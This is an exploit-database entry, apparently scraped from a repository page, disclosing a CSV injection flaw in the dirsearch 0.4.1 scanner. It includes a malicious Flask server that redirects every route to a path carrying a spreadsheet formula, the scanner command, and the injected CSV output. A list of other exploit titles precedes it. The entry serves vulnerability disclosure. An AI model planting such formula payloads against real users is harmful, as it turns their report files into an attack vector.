e95d9f2c13
23 changes to exploits/shellcodes dirsearch 0.4.1 - CSV Injection IObit Uninstaller 10 Pro - Unquoted Service Path WinAVR Version 20100110 - Insecure Folder Permissions PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation H2 Database 1.4.199 - JNI Code Execution Responsive ELearning System 1.0 - 'id' Sql Injection Responsive E-Learning System 1.0 - 'id' Sql Injection Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF) IPeakCMS 3.5 - Boolean-based blind SQLi Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting WordPress Plugin litespeed cache 3.6 - 'server_ip' Cross-Site Scripting Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE Responsive E-Learning System 1.0 - Stored Cross Site Scripting WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting Newgen Correspondence Management System (corms) eGov 12.0 - IDOR Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated) Resumes Management and Job Application Website 1.0 - Multiple Stored XSS Gitea 1.7.5 - Remote Code Execution Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
57 lines
No EOL
1.7 KiB
Text
57 lines
No EOL
1.7 KiB
Text
# Exploit Title: dirsearch 0.4.1 - CSV Injection
|
|
# Author: Dolev Farhi
|
|
# Date: 2021-01-05
|
|
# Vendor Homepage: https://github.com/maurosoria/dirsearch
|
|
# Version : 0.4.1
|
|
# Tested on: Debian 9.13
|
|
|
|
dirsearch, when used with the --csv-report flag, writes the results of crawled endpoints which redirect(, to a csv file without sanitization.
|
|
A malicious server can redirect all of its routes/paths to a path that contains a comma and formula, e.g. /test,=1336+1, and escape the normal dirsearch CSV structure to inject its own formula.
|
|
|
|
Malicious Flask Webserver:
|
|
|
|
"""
|
|
from flask import Flask, redirect
|
|
app = Flask(__name__)
|
|
|
|
@app.route('/')
|
|
def index():
|
|
return redirect('/test,=1336+1')
|
|
|
|
@app.route('/admin')
|
|
def admin():
|
|
return redirect('/test,=1336+1')
|
|
|
|
@app.route('/login')
|
|
def login():
|
|
return redirect('/test,=1336+1')
|
|
"""
|
|
|
|
|
|
2. Tester runs dirsearch
|
|
root@host:~/# python3 dirsearch.py -u http://10.0.0.1 --csv-report=report.csv
|
|
|
|
|
|
_|. _ _ _ _ _ _|_ v0.4.1
|
|
(_||| _) (/_(_|| (_| )
|
|
|
|
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 30 | Wordlist size: 2
|
|
|
|
Error Log: /root/tools/dirsearch/logs/errors-21-01-06_04-29-10.log
|
|
|
|
Target: http://10.0.0.1
|
|
|
|
Output File: /root/tools/dirsearch/reports/10.0.0.1/_21-01-06_04-29-10.txt
|
|
|
|
[04:29:10] Starting:
|
|
[04:29:11] 302 - 233B - /admin -> http://10.0.0.1/test,=1336+1
|
|
[04:29:11] 302 - 233B - /login -> http://10.0.0.1/test,=1336+1
|
|
|
|
|
|
3. Result CSV
|
|
|
|
root@host:~/# cat report.csv
|
|
|
|
Time,URL,Status,Size,Redirection
|
|
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/admin,302,233,http://10.0.0.1/test,=1336+1
|
|
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/login,302,233,http://10.0.0.1/test,=1336+1 |